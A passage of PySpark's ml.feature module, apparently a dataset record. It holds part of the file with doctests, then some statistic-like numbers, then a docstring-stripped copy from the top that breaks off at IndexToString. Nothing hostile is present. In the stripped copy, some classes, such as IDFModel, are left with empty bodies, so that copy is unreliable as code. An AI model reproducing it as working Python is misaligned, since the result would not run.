defaultStopWords = stopWordsObj.English()
self._setDefault(stopWords=defaultStopWords)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inputCol=None, outputCol=None, stopWords=None,
caseSensitive=False):
"""
setParams(self, inputCol="input", outputCol="output", stopWords=None,\
caseSensitive=false)
Sets params for this StopWordRemover.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setStopWords(self, value):
"""
Specify the stopwords to be filtered.
"""
self._paramMap[self.stopWords] = value
return self
def getStopWords(self):
"""
Get the stopwords.
"""
return self.getOrDefault(self.stopWords)
def setCaseSensitive(self, value):
"""
Set whether to do a case sensitive comparison over the stop words
"""
self._paramMap[self.caseSensitive] = value
return self
def getCaseSensitive(self):
"""
Get whether to do a case sensitive comparison over the stop words.
"""
return self.getOrDefault(self.caseSensitive)
@inherit_doc
@ignore_unicode_prefix
class Tokenizer(JavaTransformer, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
A tokenizer that converts the input string to lowercase and then
splits it by white spaces.
>>> df = sqlContext.createDataFrame([("a b c",)], ["text"])
>>> tokenizer = Tokenizer(inputCol="text", outputCol="words")
>>> tokenizer.transform(df).head()
Row(text=u'a b c', words=[u'a', u'b', u'c'])
>>> # Change a parameter.
>>> tokenizer.setParams(outputCol="tokens").transform(df).head()
Row(text=u'a b c', tokens=[u'a', u'b', u'c'])
>>> # Temporarily modify a parameter.
>>> tokenizer.transform(df, {tokenizer.outputCol: "words"}).head()
Row(text=u'a b c', words=[u'a', u'b', u'c'])
>>> tokenizer.transform(df).head()
Row(text=u'a b c', tokens=[u'a', u'b', u'c'])
>>> # Must use keyword arguments to specify params.
>>> tokenizer.setParams("text")
Traceback (most recent call last):
...
TypeError: Method setParams forces keyword arguments.
"""
@keyword_only
def __init__(self, inputCol=None, outputCol=None):
"""
__init__(self, inputCol=None, outputCol=None)
"""
super(Tokenizer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.Tokenizer", self.uid)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inputCol=None, outputCol=None):
"""
setParams(self, inputCol="input", outputCol="output")
Sets params for this Tokenizer.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
@inherit_doc
class VectorAssembler(JavaTransformer, HasInputCols, HasOutputCol):
"""
.. note:: Experimental
A feature transformer that merges multiple columns into a vector column.
>>> df = sqlContext.createDataFrame([(1, 0, 3)], ["a", "b", "c"])
>>> vecAssembler = VectorAssembler(inputCols=["a", "b", "c"], outputCol="features")
>>> vecAssembler.transform(df).head().features
DenseVector([1.0, 0.0, 3.0])
>>> vecAssembler.setParams(outputCol="freqs").transform(df).head().freqs
DenseVector([1.0, 0.0, 3.0])
>>> params = {vecAssembler.inputCols: ["b", "a"], vecAssembler.outputCol: "vector"}
>>> vecAssembler.transform(df, params).head().vector
DenseVector([0.0, 1.0])
"""
@keyword_only
def __init__(self, inputCols=None, outputCol=None):
"""
__init__(self, inputCols=None, outputCol=None)
"""
super(VectorAssembler, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.VectorAssembler", self.uid)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inputCols=None, outputCol=None):
"""
setParams(self, inputCols=None, outputCol=None)
Sets params for this VectorAssembler.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
@inherit_doc
class VectorIndexer(JavaEstimator, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
Class for indexing categorical feature columns in a dataset of [[Vector]].
This has 2 usage modes:
- Automatically identify categorical features (default behavior)
- This helps process a dataset of unknown vectors into a dataset with some continuous
features and some categorical features. The choice between continuous and categorical
is based upon a maxCategories parameter.
- Set maxCategories to the maximum number of categorical any categorical feature should
have.
- E.g.: Feature 0 has unique values {-1.0, 0.0}, and feature 1 values {1.0, 3.0, 5.0}.
If maxCategories = 2, then feature 0 will be declared categorical and use indices {0, 1},
and feature 1 will be declared continuous.
- Index all features, if all features are categorical
- If maxCategories is set to be very large, then this will build an index of unique
values for all features.
- Warning: This can cause problems if features are continuous since this will collect ALL
unique values to the driver.
- E.g.: Feature 0 has unique values {-1.0, 0.0}, and feature 1 values {1.0, 3.0, 5.0}.
If maxCategories >= 3, then both features will be declared categorical.
This returns a model which can transform categorical features to use 0-based indices.
Index stability:
- This is not guaranteed to choose the same category index across multiple runs.
- If a categorical feature includes value 0, then this is guaranteed to map value 0 to
index 0. This maintains vector sparsity.
- More stability may be added in the future.
TODO: Future extensions: The following functionality is planned for the future:
- Preserve metadata in transform; if a feature's metadata is already present,
do not recompute.
- Specify certain features to not index, either via a parameter or via existing metadata.
- Add warning if a categorical feature has only 1 category.
- Add option for allowing unknown categories.
>>> from pyspark.mllib.linalg import Vectors
>>> df = sqlContext.createDataFrame([(Vectors.dense([-1.0, 0.0]),),
... (Vectors.dense([0.0, 1.0]),), (Vectors.dense([0.0, 2.0]),)], ["a"])
>>> indexer = VectorIndexer(maxCategories=2, inputCol="a", outputCol="indexed")
>>> model = indexer.fit(df)
>>> model.transform(df).head().indexed
DenseVector([1.0, 0.0])
>>> indexer.setParams(outputCol="test").fit(df).transform(df).collect()[1].test
DenseVector([0.0, 1.0])
>>> params = {indexer.maxCategories: 3, indexer.outputCol: "vector"}
>>> model2 = indexer.fit(df, params)
>>> model2.transform(df).head().vector
DenseVector([1.0, 0.0])
"""
# a placeholder to make it appear in the generated doc
maxCategories = Param(Params._dummy(), "maxCategories",
"Threshold for the number of values a categorical feature can take " +
"(>= 2). If a feature is found to have > maxCategories values, then " +
"it is declared continuous.")
@keyword_only
def __init__(self, maxCategories=20, inputCol=None, outputCol=None):
"""
__init__(self, maxCategories=20, inputCol=None, outputCol=None)
"""
super(VectorIndexer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.VectorIndexer", self.uid)
self.maxCategories = Param(self, "maxCategories",
"Threshold for the number of values a categorical feature " +
"can take (>= 2). If a feature is found to have " +
"> maxCategories values, then it is declared continuous.")
self._setDefault(maxCategories=20)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, maxCategories=20, inputCol=None, outputCol=None):
"""
setParams(self, maxCategories=20, inputCol=None, outputCol=None)
Sets params for this VectorIndexer.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setMaxCategories(self, value):
"""
Sets the value of :py:attr:`maxCategories`.
"""
self._paramMap[self.maxCategories] = value
return self
def getMaxCategories(self):
"""
Gets the value of maxCategories or its default value.
"""
return self.getOrDefault(self.maxCategories)
def _create_model(self, java_model):
return VectorIndexerModel(java_model)
class VectorIndexerModel(JavaModel):
"""
.. note:: Experimental
Model fitted by VectorIndexer.
"""
@inherit_doc
class VectorSlicer(JavaTransformer, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
This class takes a feature vector and outputs a new feature vector with a subarray
of the original features.
The subset of features can be specified with either indices (`setIndices()`)
or names (`setNames()`). At least one feature must be selected. Duplicate features
are not allowed, so there can be no overlap between selected indices and names.
The output vector will order features with the selected indices first (in the order given),
followed by the selected names (in the order given).
>>> from pyspark.mllib.linalg import Vectors
>>> df = sqlContext.createDataFrame([
... (Vectors.dense([-2.0, 2.3, 0.0, 0.0, 1.0]),),
... (Vectors.dense([0.0, 0.0, 0.0, 0.0, 0.0]),),
... (Vectors.dense([0.6, -1.1, -3.0, 4.5, 3.3]),)], ["features"])
>>> vs = VectorSlicer(inputCol="features", outputCol="sliced", indices=[1, 4])
>>> vs.transform(df).head().sliced
DenseVector([2.3, 1.0])
"""
# a placeholder to make it appear in the generated doc
indices = Param(Params._dummy(), "indices", "An array of indices to select features from " +
"a vector column. There can be no overlap with names.")
names = Param(Params._dummy(), "names", "An array of feature names to select features from " +
"a vector column. These names must be specified by ML " +
"org.apache.spark.ml.attribute.Attribute. There can be no overlap with " +
"indices.")
@keyword_only
def __init__(self, inputCol=None, outputCol=None, indices=None, names=None):
"""
__init__(self, inputCol=None, outputCol=None, indices=None, names=None)
"""
super(VectorSlicer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.VectorSlicer", self.uid)
self.indices = Param(self, "indices", "An array of indices to select features from " +
"a vector column. There can be no overlap with names.")
self.names = Param(self, "names", "An array of feature names to select features from " +
"a vector column. These names must be specified by ML " +
"org.apache.spark.ml.attribute.Attribute. There can be no overlap " +
"with indices.")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inputCol=None, outputCol=None, indices=None, names=None):
"""
setParams(self, inputCol=None, outputCol=None, indices=None, names=None):
Sets params for this VectorSlicer.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setIndices(self, value):
"""
Sets the value of :py:attr:`indices`.
"""
self._paramMap[self.indices] = value
return self
def getIndices(self):
"""
Gets the value of indices or its default value.
"""
return self.getOrDefault(self.indices)
def setNames(self, value):
"""
Sets the value of :py:attr:`names`.
"""
self._paramMap[self.names] = value
return self
def getNames(self):
"""
Gets the value of names or its default value.
"""
return self.getOrDefault(self.names)
@inherit_doc
@ignore_unicode_prefix
class Word2Vec(JavaEstimator, HasStepSize, HasMaxIter, HasSeed, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
Word2Vec trains a model of `Map(String, Vector)`, i.e. transforms a word into a code for further
natural language processing or machine learning process.
>>> sent = ("a b " * 100 + "a c " * 10).split(" ")
>>> doc = sqlContext.createDataFrame([(sent,), (sent,)], ["sentence"])
>>> model = Word2Vec(vectorSize=5, seed=42, inputCol="sentence", outputCol="model").fit(doc)
>>> model.getVectors().show()
+----+--------------------+
|word| vector|
+----+--------------------+
| a|[-0.3511952459812...|
| b|[0.29077222943305...|
| c|[0.02315592765808...|
+----+--------------------+
...
>>> model.findSynonyms("a", 2).show()
+----+-------------------+
|word| similarity|
+----+-------------------+
| b|0.29255685145799626|
| c|-0.5414068302988307|
+----+-------------------+
...
>>> model.transform(doc).head().model
DenseVector([-0.0422, -0.5138, -0.2546, 0.6885, 0.276])
"""
# a placeholder to make it appear in the generated doc
vectorSize = Param(Params._dummy(), "vectorSize",
"the dimension of codes after transforming from words")
numPartitions = Param(Params._dummy(), "numPartitions",
"number of partitions for sentences of words")
minCount = Param(Params._dummy(), "minCount",
"the minimum number of times a token must appear to be included in the " +
"word2vec model's vocabulary")
@keyword_only
def __init__(self, vectorSize=100, minCount=5, numPartitions=1, stepSize=0.025, maxIter=1,
seed=None, inputCol=None, outputCol=None):
"""
__init__(self, vectorSize=100, minCount=5, numPartitions=1, stepSize=0.025, maxIter=1, \
seed=None, inputCol=None, outputCol=None)
"""
super(Word2Vec, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.Word2Vec", self.uid)
self.vectorSize = Param(self, "vectorSize",
"the dimension of codes after transforming from words")
self.numPartitions = Param(self, "numPartitions",
"number of partitions for sentences of words")
self.minCount = Param(self, "minCount",
"the minimum number of times a token must appear to be included " +
"in the word2vec model's vocabulary")
self._setDefault(vectorSize=100, minCount=5, numPartitions=1, stepSize=0.025, maxIter=1,
seed=None)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, vectorSize=100, minCount=5, numPartitions=1, stepSize=0.025, maxIter=1,
seed=None, inputCol=None, outputCol=None):
"""
setParams(self, minCount=5, numPartitions=1, stepSize=0.025, maxIter=1, seed=None, \
inputCol=None, outputCol=None)
Sets params for this Word2Vec.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setVectorSize(self, value):
"""
Sets the value of :py:attr:`vectorSize`.
"""
self._paramMap[self.vectorSize] = value
return self
def getVectorSize(self):
"""
Gets the value of vectorSize or its default value.
"""
return self.getOrDefault(self.vectorSize)
def setNumPartitions(self, value):
"""
Sets the value of :py:attr:`numPartitions`.
"""
self._paramMap[self.numPartitions] = value
return self
def getNumPartitions(self):
"""
Gets the value of numPartitions or its default value.
"""
return self.getOrDefault(self.numPartitions)
def setMinCount(self, value):
"""
Sets the value of :py:attr:`minCount`.
"""
self._paramMap[self.minCount] = value
return self
def getMinCount(self):
"""
Gets the value of minCount or its default value.
"""
return self.getOrDefault(self.minCount)
def _create_model(self, java_model):
return Word2VecModel(java_model)
class Word2VecModel(JavaModel):
"""
.. note:: Experimental
Model fitted by Word2Vec.
"""
def getVectors(self):
"""
Returns the vector representation of the words as a dataframe
with two fields, word and vector.
"""
return self._call_java("getVectors")
def findSynonyms(self, word, num):
"""
Find "num" number of words closest in similarity to "word".
word can be a string or vector representation.
Returns a dataframe with two fields word and similarity (which
gives the cosine similarity).
"""
if not isinstance(word, basestring):
word = _convert_to_vector(word)
return self._call_java("findSynonyms", word, num)
@inherit_doc
class PCA(JavaEstimator, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
PCA trains a model to project vectors to a low-dimensional space using PCA.
>>> from pyspark.mllib.linalg import Vectors
>>> data = [(Vectors.sparse(5, [(1, 1.0), (3, 7.0)]),),
... (Vectors.dense([2.0, 0.0, 3.0, 4.0, 5.0]),),
... (Vectors.dense([4.0, 0.0, 0.0, 6.0, 7.0]),)]
>>> df = sqlContext.createDataFrame(data,["features"])
>>> pca = PCA(k=2, inputCol="features", outputCol="pca_features")
>>> model = pca.fit(df)
>>> model.transform(df).collect()[0].pca_features
DenseVector([1.648..., -4.013...])
"""
# a placeholder to make it appear in the generated doc
k = Param(Params._dummy(), "k", "the number of principal components")
@keyword_only
def __init__(self, k=None, inputCol=None, outputCol=None):
"""
__init__(self, k=None, inputCol=None, outputCol=None)
"""
super(PCA, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.PCA", self.uid)
self.k = Param(self, "k", "the number of principal components")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, k=None, inputCol=None, outputCol=None):
"""
setParams(self, k=None, inputCol=None, outputCol=None)
Set params for this PCA.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setK(self, value):
"""
Sets the value of :py:attr:`k`.
"""
self._paramMap[self.k] = value
return self
def getK(self):
"""
Gets the value of k or its default value.
"""
return self.getOrDefault(self.k)
def _create_model(self, java_model):
return PCAModel(java_model)
class PCAModel(JavaModel):
"""
.. note:: Experimental
Model fitted by PCA.
"""
@inherit_doc
class RFormula(JavaEstimator, HasFeaturesCol, HasLabelCol):
"""
.. note:: Experimental
Implements the transforms required for fitting a dataset against an
R model formula. Currently we support a limited subset of the R
operators, including '~', '+', '-', and '.'. Also see the R formula
docs:
http://stat.ethz.ch/R-manual/R-patched/library/stats/html/formula.html
>>> df = sqlContext.createDataFrame([
... (1.0, 1.0, "a"),
... (0.0, 2.0, "b"),
... (0.0, 0.0, "a")
... ], ["y", "x", "s"])
>>> rf = RFormula(formula="y ~ x + s")
>>> rf.fit(df).transform(df).show()
+---+---+---+---------+-----+
| y| x| s| features|label|
+---+---+---+---------+-----+
|1.0|1.0| a|[1.0,1.0]| 1.0|
|0.0|2.0| b|[2.0,0.0]| 0.0|
|0.0|0.0| a|[0.0,1.0]| 0.0|
+---+---+---+---------+-----+
...
>>> rf.fit(df, {rf.formula: "y ~ . - s"}).transform(df).show()
+---+---+---+--------+-----+
| y| x| s|features|label|
+---+---+---+--------+-----+
|1.0|1.0| a| [1.0]| 1.0|
|0.0|2.0| b| [2.0]| 0.0|
|0.0|0.0| a| [0.0]| 0.0|
+---+---+---+--------+-----+
...
"""
# a placeholder to make it appear in the generated doc
formula = Param(Params._dummy(), "formula", "R model formula")
@keyword_only
def __init__(self, formula=None, featuresCol="features", labelCol="label"):
"""
__init__(self, formula=None, featuresCol="features", labelCol="label")
"""
super(RFormula, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.RFormula", self.uid)
self.formula = Param(self, "formula", "R model formula")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, formula=None, featuresCol="features", labelCol="label"):
"""
setParams(self, formula=None, featuresCol="features", labelCol="label")
Sets params for RFormula.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setFormula(self, value):
"""
Sets the value of :py:attr:`formula`.
"""
self._paramMap[self.formula] = value
return self
def getFormula(self):
"""
Gets the value of :py:attr:`formula`.
"""
return self.getOrDefault(self.formula)
def _create_model(self, java_model):
return RFormulaModel(java_model)
class RFormulaModel(JavaModel):
"""
.. note:: Experimental
Model fitted by :py:class:`RFormula`.
"""
if __name__ == "__main__":
import doctest
from pyspark.context import SparkContext
from pyspark.sql import Row, SQLContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
sc = SparkContext("local[2]", "ml.feature tests")
sqlContext = SQLContext(sc)
globs['sc'] = sc
globs['sqlContext'] = sqlContext
testData = sc.parallelize([Row(id=0, label="a"), Row(id=1, label="b"),
Row(id=2, label="c"), Row(id=3, label="a"),
Row(id=4, label="a"), Row(id=5, label="c")], 2)
globs['stringIndDf'] = sqlContext.createDataFrame(testData)
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
sc.stop()
if failure_count:
exit(-1)
| 37.206592
| 100
| 0.619119
|
import sys
if sys.version > '3':
basestring = str
from pyspark.rdd import ignore_unicode_prefix
from pyspark.ml.param.shared import *
from pyspark.ml.util import keyword_only
from pyspark.ml.wrapper import JavaEstimator, JavaModel, JavaTransformer, _jvm
from pyspark.mllib.common import inherit_doc
from pyspark.mllib.linalg import _convert_to_vector
__all__ = ['Binarizer', 'Bucketizer', 'DCT', 'ElementwiseProduct', 'HashingTF', 'IDF', 'IDFModel',
'IndexToString', 'NGram', 'Normalizer', 'OneHotEncoder', 'PCA', 'PCAModel',
'PolynomialExpansion', 'RegexTokenizer', 'RFormula', 'RFormulaModel', 'SQLTransformer',
'StandardScaler', 'StandardScalerModel', 'StopWordsRemover', 'StringIndexer',
'StringIndexerModel', 'Tokenizer', 'VectorAssembler', 'VectorIndexer', 'VectorSlicer',
'Word2Vec', 'Word2VecModel']
@inherit_doc
class Binarizer(JavaTransformer, HasInputCol, HasOutputCol):
threshold = Param(Params._dummy(), "threshold",
"threshold in binary classification prediction, in range [0, 1]")
@keyword_only
def __init__(self, threshold=0.0, inputCol=None, outputCol=None):
super(Binarizer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.Binarizer", self.uid)
self.threshold = Param(self, "threshold",
"threshold in binary classification prediction, in range [0, 1]")
self._setDefault(threshold=0.0)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, threshold=0.0, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setThreshold(self, value):
self._paramMap[self.threshold] = value
return self
def getThreshold(self):
return self.getOrDefault(self.threshold)
@inherit_doc
class Bucketizer(JavaTransformer, HasInputCol, HasOutputCol):
splits = \
Param(Params._dummy(), "splits",
"Split points for mapping continuous features into buckets. With n+1 splits, " +
"there are n buckets. A bucket defined by splits x,y holds values in the " +
"range [x,y) except the last bucket, which also includes y. The splits " +
"should be strictly increasing. Values at -inf, inf must be explicitly " +
"provided to cover all Double values; otherwise, values outside the splits " +
"specified will be treated as errors.")
@keyword_only
def __init__(self, splits=None, inputCol=None, outputCol=None):
super(Bucketizer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.Bucketizer", self.uid)
self.splits = \
Param(self, "splits",
"Split points for mapping continuous features into buckets. With n+1 splits, " +
"there are n buckets. A bucket defined by splits x,y holds values in the " +
"range [x,y) except the last bucket, which also includes y. The splits " +
"should be strictly increasing. Values at -inf, inf must be explicitly " +
"provided to cover all Double values; otherwise, values outside the splits " +
"specified will be treated as errors.")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, splits=None, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setSplits(self, value):
self._paramMap[self.splits] = value
return self
def getSplits(self):
return self.getOrDefault(self.splits)
@inherit_doc
class DCT(JavaTransformer, HasInputCol, HasOutputCol):
inverse = Param(Params._dummy(), "inverse", "Set transformer to perform inverse DCT, " +
"default False.")
@keyword_only
def __init__(self, inverse=False, inputCol=None, outputCol=None):
super(DCT, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.DCT", self.uid)
self.inverse = Param(self, "inverse", "Set transformer to perform inverse DCT, " +
"default False.")
self._setDefault(inverse=False)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inverse=False, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setInverse(self, value):
self._paramMap[self.inverse] = value
return self
def getInverse(self):
return self.getOrDefault(self.inverse)
@inherit_doc
class ElementwiseProduct(JavaTransformer, HasInputCol, HasOutputCol):
scalingVec = Param(Params._dummy(), "scalingVec", "vector for hadamard product, " +
"it must be MLlib Vector type.")
@keyword_only
def __init__(self, scalingVec=None, inputCol=None, outputCol=None):
super(ElementwiseProduct, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.ElementwiseProduct",
self.uid)
self.scalingVec = Param(self, "scalingVec", "vector for hadamard product, " +
"it must be MLlib Vector type.")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, scalingVec=None, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setScalingVec(self, value):
self._paramMap[self.scalingVec] = value
return self
def getScalingVec(self):
return self.getOrDefault(self.scalingVec)
@inherit_doc
class HashingTF(JavaTransformer, HasInputCol, HasOutputCol, HasNumFeatures):
@keyword_only
def __init__(self, numFeatures=1 << 18, inputCol=None, outputCol=None):
super(HashingTF, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.HashingTF", self.uid)
self._setDefault(numFeatures=1 << 18)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, numFeatures=1 << 18, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
@inherit_doc
class IDF(JavaEstimator, HasInputCol, HasOutputCol):
minDocFreq = Param(Params._dummy(), "minDocFreq",
"minimum of documents in which a term should appear for filtering")
@keyword_only
def __init__(self, minDocFreq=0, inputCol=None, outputCol=None):
super(IDF, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.IDF", self.uid)
self.minDocFreq = Param(self, "minDocFreq",
"minimum of documents in which a term should appear for filtering")
self._setDefault(minDocFreq=0)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, minDocFreq=0, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setMinDocFreq(self, value):
self._paramMap[self.minDocFreq] = value
return self
def getMinDocFreq(self):
return self.getOrDefault(self.minDocFreq)
def _create_model(self, java_model):
return IDFModel(java_model)
class IDFModel(JavaModel):
@inherit_doc
@ignore_unicode_prefix
class NGram(JavaTransformer, HasInputCol, HasOutputCol):
n = Param(Params._dummy(), "n", "number of elements per n-gram (>=1)")
@keyword_only
def __init__(self, n=2, inputCol=None, outputCol=None):
super(NGram, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.NGram", self.uid)
self.n = Param(self, "n", "number of elements per n-gram (>=1)")
self._setDefault(n=2)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, n=2, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setN(self, value):
self._paramMap[self.n] = value
return self
def getN(self):
return self.getOrDefault(self.n)
@inherit_doc
class Normalizer(JavaTransformer, HasInputCol, HasOutputCol):
p = Param(Params._dummy(), "p", "the p norm value.")
@keyword_only
def __init__(self, p=2.0, inputCol=None, outputCol=None):
super(Normalizer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.Normalizer", self.uid)
self.p = Param(self, "p", "the p norm value.")
self._setDefault(p=2.0)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, p=2.0, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setP(self, value):
self._paramMap[self.p] = value
return self
def getP(self):
return self.getOrDefault(self.p)
@inherit_doc
class OneHotEncoder(JavaTransformer, HasInputCol, HasOutputCol):
dropLast = Param(Params._dummy(), "dropLast", "whether to drop the last category")
@keyword_only
def __init__(self, dropLast=True, inputCol=None, outputCol=None):
super(OneHotEncoder, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.OneHotEncoder", self.uid)
self.dropLast = Param(self, "dropLast", "whether to drop the last category")
self._setDefault(dropLast=True)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, dropLast=True, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setDropLast(self, value):
self._paramMap[self.dropLast] = value
return self
def getDropLast(self):
return self.getOrDefault(self.dropLast)
@inherit_doc
class PolynomialExpansion(JavaTransformer, HasInputCol, HasOutputCol):
degree = Param(Params._dummy(), "degree", "the polynomial degree to expand (>= 1)")
@keyword_only
def __init__(self, degree=2, inputCol=None, outputCol=None):
super(PolynomialExpansion, self).__init__()
self._java_obj = self._new_java_obj(
"org.apache.spark.ml.feature.PolynomialExpansion", self.uid)
self.degree = Param(self, "degree", "the polynomial degree to expand (>= 1)")
self._setDefault(degree=2)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, degree=2, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setDegree(self, value):
self._paramMap[self.degree] = value
return self
def getDegree(self):
return self.getOrDefault(self.degree)
@inherit_doc
@ignore_unicode_prefix
class RegexTokenizer(JavaTransformer, HasInputCol, HasOutputCol):
minTokenLength = Param(Params._dummy(), "minTokenLength", "minimum token length (>= 0)")
gaps = Param(Params._dummy(), "gaps", "whether regex splits on gaps (True) or matches tokens")
pattern = Param(Params._dummy(), "pattern", "regex pattern (Java dialect) used for tokenizing")
@keyword_only
def __init__(self, minTokenLength=1, gaps=True, pattern="\\s+", inputCol=None, outputCol=None):
super(RegexTokenizer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.RegexTokenizer", self.uid)
self.minTokenLength = Param(self, "minTokenLength", "minimum token length (>= 0)")
self.gaps = Param(self, "gaps", "whether regex splits on gaps (True) or matches tokens")
self.pattern = Param(self, "pattern", "regex pattern (Java dialect) used for tokenizing")
self._setDefault(minTokenLength=1, gaps=True, pattern="\\s+")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, minTokenLength=1, gaps=True, pattern="\\s+", inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setMinTokenLength(self, value):
self._paramMap[self.minTokenLength] = value
return self
def getMinTokenLength(self):
return self.getOrDefault(self.minTokenLength)
def setGaps(self, value):
self._paramMap[self.gaps] = value
return self
def getGaps(self):
return self.getOrDefault(self.gaps)
def setPattern(self, value):
self._paramMap[self.pattern] = value
return self
def getPattern(self):
return self.getOrDefault(self.pattern)
@inherit_doc
class SQLTransformer(JavaTransformer):
statement = Param(Params._dummy(), "statement", "SQL statement")
@keyword_only
def __init__(self, statement=None):
super(SQLTransformer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.SQLTransformer", self.uid)
self.statement = Param(self, "statement", "SQL statement")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, statement=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setStatement(self, value):
self._paramMap[self.statement] = value
return self
def getStatement(self):
return self.getOrDefault(self.statement)
@inherit_doc
class StandardScaler(JavaEstimator, HasInputCol, HasOutputCol):
withMean = Param(Params._dummy(), "withMean", "Center data with mean")
withStd = Param(Params._dummy(), "withStd", "Scale to unit standard deviation")
@keyword_only
def __init__(self, withMean=False, withStd=True, inputCol=None, outputCol=None):
super(StandardScaler, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.StandardScaler", self.uid)
self.withMean = Param(self, "withMean", "Center data with mean")
self.withStd = Param(self, "withStd", "Scale to unit standard deviation")
self._setDefault(withMean=False, withStd=True)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, withMean=False, withStd=True, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setWithMean(self, value):
self._paramMap[self.withMean] = value
return self
def getWithMean(self):
return self.getOrDefault(self.withMean)
def setWithStd(self, value):
self._paramMap[self.withStd] = value
return self
def getWithStd(self):
return self.getOrDefault(self.withStd)
def _create_model(self, java_model):
return StandardScalerModel(java_model)
class StandardScalerModel(JavaModel):
@property
def std(self):
return self._call_java("std")
@property
def mean(self):
return self._call_java("mean")
@inherit_doc
class StringIndexer(JavaEstimator, HasInputCol, HasOutputCol):
@keyword_only
def __init__(self, inputCol=None, outputCol=None):
super(StringIndexer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.StringIndexer", self.uid)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def _create_model(self, java_model):
return StringIndexerModel(java_model)
class StringIndexerModel(JavaModel):
@property
def labels(self):
return self._java_obj.labels
@inherit_doc
class IndexToString(JavaTransformer, HasInputCol, HasOutputCol):
labels = Param(Params._dummy(), "labels",
